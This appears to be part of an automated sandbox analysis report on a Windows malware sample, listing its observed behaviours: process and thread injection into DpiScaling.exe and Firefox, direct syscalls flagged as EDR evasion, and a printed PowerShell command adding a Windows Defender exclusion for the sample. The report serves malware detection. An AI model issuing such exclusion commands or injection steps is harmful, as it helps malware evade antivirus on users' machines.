Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01364B4B mov eax, dword ptr fs:[00000030h]	4_2_01364B4B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01364BB0 mov eax, dword ptr fs:[00000030h]	4_2_01364BB0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01364BB0 mov eax, dword ptr fs:[00000030h]	4_2_01364BB0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0BBE mov eax, dword ptr fs:[00000030h]	4_2_012C0BBE
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0BBE mov eax, dword ptr fs:[00000030h]	4_2_012C0BBE
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0133CBF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DEBFC mov eax, dword ptr fs:[00000030h]	4_2_012DEBFC
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8BF0 mov eax, dword ptr fs:[00000030h]	4_2_012B8BF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8BF0 mov eax, dword ptr fs:[00000030h]	4_2_012B8BF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8BF0 mov eax, dword ptr fs:[00000030h]	4_2_012B8BF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0135EBD0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0BCD mov eax, dword ptr fs:[00000030h]	4_2_012B0BCD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0BCD mov eax, dword ptr fs:[00000030h]	4_2_012B0BCD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0BCD mov eax, dword ptr fs:[00000030h]	4_2_012B0BCD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D0BCB mov eax, dword ptr fs:[00000030h]	4_2_012D0BCB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D0BCB mov eax, dword ptr fs:[00000030h]	4_2_012D0BCB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D0BCB mov eax, dword ptr fs:[00000030h]	4_2_012D0BCB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DEA2E mov eax, dword ptr fs:[00000030h]	4_2_012DEA2E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012ECA24 mov eax, dword ptr fs:[00000030h]	4_2_012ECA24
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012ECA38 mov eax, dword ptr fs:[00000030h]	4_2_012ECA38
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D4A35 mov eax, dword ptr fs:[00000030h]	4_2_012D4A35
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D4A35 mov eax, dword ptr fs:[00000030h]	4_2_012D4A35
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133CA11 mov eax, dword ptr fs:[00000030h]	4_2_0133CA11
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132CA72 mov eax, dword ptr fs:[00000030h]	4_2_0132CA72
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132CA72 mov eax, dword ptr fs:[00000030h]	4_2_0132CA72
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012ECA6F mov eax, dword ptr fs:[00000030h]	4_2_012ECA6F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012ECA6F mov eax, dword ptr fs:[00000030h]	4_2_012ECA6F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012ECA6F mov eax, dword ptr fs:[00000030h]	4_2_012ECA6F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135EA60 mov eax, dword ptr fs:[00000030h]	4_2_0135EA60
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0A5B mov eax, dword ptr fs:[00000030h]	4_2_012C0A5B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0A5B mov eax, dword ptr fs:[00000030h]	4_2_012C0A5B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6A50 mov eax, dword ptr fs:[00000030h]	4_2_012B6A50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8AA0 mov eax, dword ptr fs:[00000030h]	4_2_012B8AA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8AA0 mov eax, dword ptr fs:[00000030h]	4_2_012B8AA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01306AA4 mov eax, dword ptr fs:[00000030h]	4_2_01306AA4
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BEA80 mov eax, dword ptr fs:[00000030h]	4_2_012BEA80

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe"
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Memory written: C:\Users\user\Desktop\4p5XLVXJnq.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: NULL target: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\DpiScaling.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\DpiScaling.exe

Thread register set: target process: 1120

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\DpiScaling.exe

Thread APC queued: target process: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Users\user\Desktop\4p5XLVXJnq.exe "C:\Users\user\Desktop\4p5XLVXJnq.exe"	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe "C:\Windows\SysWOW64\DpiScaling.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: yAMzZKaZoBLE.exe, 00000008.00000002.3910762927.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000000.2419901330.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3910974797.0000000000D91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: yAMzZKaZoBLE.exe, 00000008.00000002.3910762927.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000000.2419901330.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3910974797.0000000000D91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: yAMzZKaZoBLE.exe, 00000008.00000002.3910762927.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000000.2419901330.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3910974797.0000000000D91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: yAMzZKaZoBLE.exe, 00000008.00000002.3910762927.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000000.2419901330.00000000015C1000.00000002.00000001.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3910974797.0000000000D91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Queries volume information: C:\Users\user\Desktop\4p5XLVXJnq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
